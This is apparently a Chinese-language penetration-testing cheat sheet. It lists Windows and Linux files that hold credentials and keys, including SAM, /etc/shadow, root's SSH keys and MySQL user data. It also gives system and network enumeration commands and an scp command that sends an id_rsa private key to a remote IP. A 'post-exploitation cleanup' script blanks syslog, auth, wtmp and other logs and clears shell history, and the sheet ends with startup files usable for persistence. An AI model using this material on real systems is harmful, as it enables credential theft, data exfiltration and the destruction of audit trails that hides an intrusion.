windows下的敏感文件路径
c:\windows\my.ini \\安装mysql时会将root密码写入该文件
c:\windows\system32\config\sam \\存放windows管理员登陆密码
C:\windows\repair\sam //存储系统初次安装的密码
c:\windows\system32\inetsrv\MetaBase.xml \\存放iis配置文件
c:\tomcat5.0\conf\resin.conf tomcat存放密码的位置
C:\boot.ini //查看系统版本
C:\windows\win.ini //基本系统配置文件
C:\ProgramFiles\mysql\my.ini //Mysq1配置
C:/ProgramFiles/mysql/data/mysql/user.MYD //Mysqlroot
C:\windows\php.ini //php配置信息
linux下的敏感文件路径
/usr/local/app/apache2/conf/httpd.conf //apache2缺省配置文件
/usr/local/app/php5/lib/php.ini //PHP相关设置
/etc/sysconfig/network-scripts/ifcfg-eth0 //查看IP
/etc/my.cnf //mysql的配置文件
/etc/redhat-release //系统版本/etc/rc.local 有时可以读出来apache的路径
/etc/passwd /etc/shadow //用户信息密码存放文件
/etc/my.cnf //mysql配置文件
/etc/httpd,/conf/httpd.conf //apache配置文件
/root/.ssh/authorized._keys //ssh登录认证文件
/root/.ssh/id_rsa.keystore.//密钥存放文件
/root/.ssh/known_hosts//已访问过的主机公钥记录文件
/root/.bash_history //记录系统历史命令文件
/root/.mysql_history //记录数据库历史命令文件
/proc/self/fd/fd[0-9]*(文件标识符)//连接当前正运行的进程
/proc/mounts //已挂载的文件系统信息
/porc/config.gz //内核配置文件
敏感命令
#System Version
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release
#User Env
cat /etc/profile
cat /etc/bashrc
set
#env
cat ~/.bash_logout
cat ~/.bashrc
cat ~/.bash_profile
#Networking
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig --list
last
#SCP
scp id_rsa username@10.10.164.167:~/destination -P 1337
scp user@10.10.164.167:~/path_to_file file_saved -P 1337
#python
python3 -m http.server 1337
python -m SimpleHTTPServer 1337
#download
wget http://url
curl -o local_save_path http://url
# # # # # # # # # # # # # # # # # # 后渗透扫尾 # # # # # # # # # # # # # # # # # #
汇总脚本 权限一般只有root能写
#!/usr/bin/bash
echo >/var/log/syslog
echo >/var/log/messages
echo >/var/log/httpd/access_log
echo >/var/log/httpd/error_loge
echo >/var/log/xferlog
echo >/var/log/secure
echo >/var/log/auth.log
echo >/var/log/user.log
echo >/var/log/wtmp
echo >/var/log/lastlog
echo >/var/log/btmp
echo >/var/run/utmp
history -c
/etc/rc.local ####################开机启动项 Redhat
->/etc/rc.d/rc.local
~/.bashrc ####################终端启动项 Redhat
/etc/bashrc ####################终端启动项 Redhat
/etc/bash.bashrc###################终端启动项 DeBain
WebServer默认文件路径
Web敏感文件.jpg